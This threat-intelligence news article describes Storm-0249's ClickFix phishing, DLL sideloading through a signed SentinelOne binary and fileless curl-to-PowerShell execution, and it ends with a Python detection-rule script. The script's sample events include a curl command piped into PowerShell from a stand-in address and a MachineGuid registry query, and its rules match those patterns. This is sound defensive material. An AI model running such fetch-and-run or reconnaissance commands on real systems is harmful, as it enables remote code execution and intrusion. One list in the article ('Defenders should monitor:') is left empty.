
Redazione RHC : 15 December 2025 07:28
A well-known initial access broker (IAB) called "Storm-0249" has changed its operational strategy, using both phishing campaigns and highly targeted attacks that exploit the very security tools designed to protect networks as a means to achieve its goals.
The group uses an alarming new technique based on a method called DLL sideloading. Storm-0249 spreads malicious MSI packages via phishing campaigns, often using a social engineering tactic called "ClickFix," which tricks users into executing commands to fix bogus technical issues.
The ReliaQuest Threat Research Team (building on analysis partly developed by Trend Micro specialists) has published an updated report highlighting that the threat group is also misusing legitimate endpoint detection and response (EDR) processes, especially SentinelOne components, in order to cover its tracks and facilitate the launch of ransomware-type attacks.
Once executed with SYSTEM privileges, the installer drops a legitimate, digitally signed version of SentinelAgentWorker.exe, a core component of the SentinelOne security agent, into the user's AppData folder. Alongside it, the installer places a malicious file named SentinelAgentCore.dll.
"When the attacker-carried SentinelOne binary is launched, it loads the malicious DLL instead of the legitimate one located alongside it," the report explains.
This effectively turns the security tool into a Trojan horse. To network defense professionals, the activity appears as a standard EDR operation, allowing attackers to bypass signature-based detection and establish encrypted command-and-control (C2) channels disguised as legitimate telemetry.
Defenders should monitor:
In addition to sideloading, Storm-0249 also abuses built-in Windows utilities to evade detection. The group creates fake domains that mimic Microsoft URLs (for example, /us.microsoft.com/) to trick users and security filters.
ReliaQuest emphasizes that this does not indicate a vulnerability in SentinelOne itself. “Legitimate processes within common EDR tools, including SentinelOne, are not exploited, bypassed, evaded, or compromised with the techniques described in this document.” Instead, attackers are abusing the trust placed in signed binaries.
They then use curl.exe, a standard data transfer tool, to retrieve malicious scripts and send them directly to PowerShell memory. “Rather than saving the script to disk, where antivirus software could intercept it, the command sends the contents directly to PowerShell memory for immediate execution,” creating a “fileless” attack chain that leaves minimal forensic evidence.
The ultimate goal of these intrusions is to sell access to ransomware groups like LockBit and ALPHV. The report emphasizes that Storm-0249 conducts specific reconnaissance to extract the MachineGuid, a unique system identifier.
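The behaviours described above (a signed SentinelOne binary running from a user-writable folder, curl output piped straight into PowerShell, lookalike Microsoft URLs, and MachineGuid reconnaissance) can each be turned into a simple process-creation detection rule. The following Python is an added example written for this article; it is not code from the ReliaQuest report. The events are constructed, Sysmon Event ID 1 style records (field names `Image`, `ParentImage`, `CommandLine` are assumed), the SentinelOne install path under `C:\Program Files\SentinelOne` is an assumption about a default install, and the MachineGuid lookup under `HKLM\SOFTWARE\Microsoft\Cryptography` reflects the value's standard registry location rather than anything the report states.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are illustrative records written for this example, not log lines from the report.
SAMPLE_EVENTS = [
    # Normal: the SentinelOne worker launched by the agent from its install directory (assumed path).
    {"Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "ParentImage": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgent.exe",
     "CommandLine": r'"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe"'},
    # Suspicious: the same signed binary dropped by an MSI installer under a user's AppData.
    {"Image": r"C:\Users\alice\AppData\Roaming\Updater\SentinelAgentWorker.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Roaming\Updater\SentinelAgentWorker.exe"'},
    # Suspicious: curl output piped into PowerShell, fetched from a lookalike "microsoft.com" path.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c curl.exe -s http://203.0.113.10/us.microsoft.com/update | powershell.exe -"},
    # Suspicious: reading the MachineGuid value (standard registry location, not from the report).
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
    # Benign: curl writing a download to disk from a genuine Microsoft host.
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl.exe -o installer.msi https://download.microsoft.com/x/installer.msi"},
]

# Binary name taken from the article; install directory is an assumed default.
SENTINEL_BINARIES = {"sentinelagentworker.exe"}
SENTINEL_INSTALL_DIR = "c:\\program files\\sentinelone\\"
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def rule_edr_binary_misplaced(ev):
    """SentinelOne agent binary executing from outside its install directory
    (e.g. a user's AppData folder): the precondition for the sideloading described above."""
    image = ev["Image"].lower()
    name = image.rsplit("\\", 1)[-1]
    return name in SENTINEL_BINARIES and not image.startswith(SENTINEL_INSTALL_DIR)


def rule_curl_piped_to_powershell(ev):
    """curl output handed to PowerShell through a pipe, or fetched inside PowerShell and
    passed to Invoke-Expression: the fetch-and-run pattern that never writes the script to disk."""
    cl = ev["CommandLine"].lower()
    piped = "curl" in cl and re.search(r"\|\s*(powershell|pwsh)", cl) is not None
    in_memory = (("powershell" in cl or "pwsh" in cl) and "iex" in cl
                 and any(k in cl for k in ("curl", "invoke-webrequest", "downloadstring")))
    return piped or in_memory


def rule_machineguid_query(ev):
    """Command line that reads the MachineGuid value from the Cryptography registry key."""
    cl = ev["CommandLine"].lower()
    return "machineguid" in cl and "cryptography" in cl


def rule_microsoft_lookalike_url(ev):
    """A URL that contains 'microsoft.com' but whose real host is not a microsoft.com host
    (the string appears as a path segment or inside a lookalike domain)."""
    for url in URL_RE.findall(ev["CommandLine"]):
        host = (urlparse(url).hostname or "").lower()
        genuine = host == "microsoft.com" or host.endswith(".microsoft.com")
        if "microsoft.com" in url.lower() and not genuine:
            return True
    return False


RULES = {
    "edr_binary_outside_install_dir": rule_edr_binary_misplaced,
    "curl_piped_to_powershell": rule_curl_piped_to_powershell,
    "machineguid_recon": rule_machineguid_query,
    "microsoft_lookalike_url": rule_microsoft_lookalike_url,
}


def evaluate(events):
    """Return [(event index, [matched rule names])] for every event that matched at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        matched = [name for name, fn in RULES.items() if fn(ev)]
        if matched:
            hits.append((i, matched))
    return hits


if __name__ == "__main__":
    for idx, names in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(names)}  <- {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Run as-is, the script flags events 1, 2 and 3 and leaves the two benign records alone. The path rule is deliberately narrow (one binary name, one install prefix) so that it stays quiet on healthy agents; in production the install prefix should come from the endpoint's actual agent inventory rather than a hard-coded default.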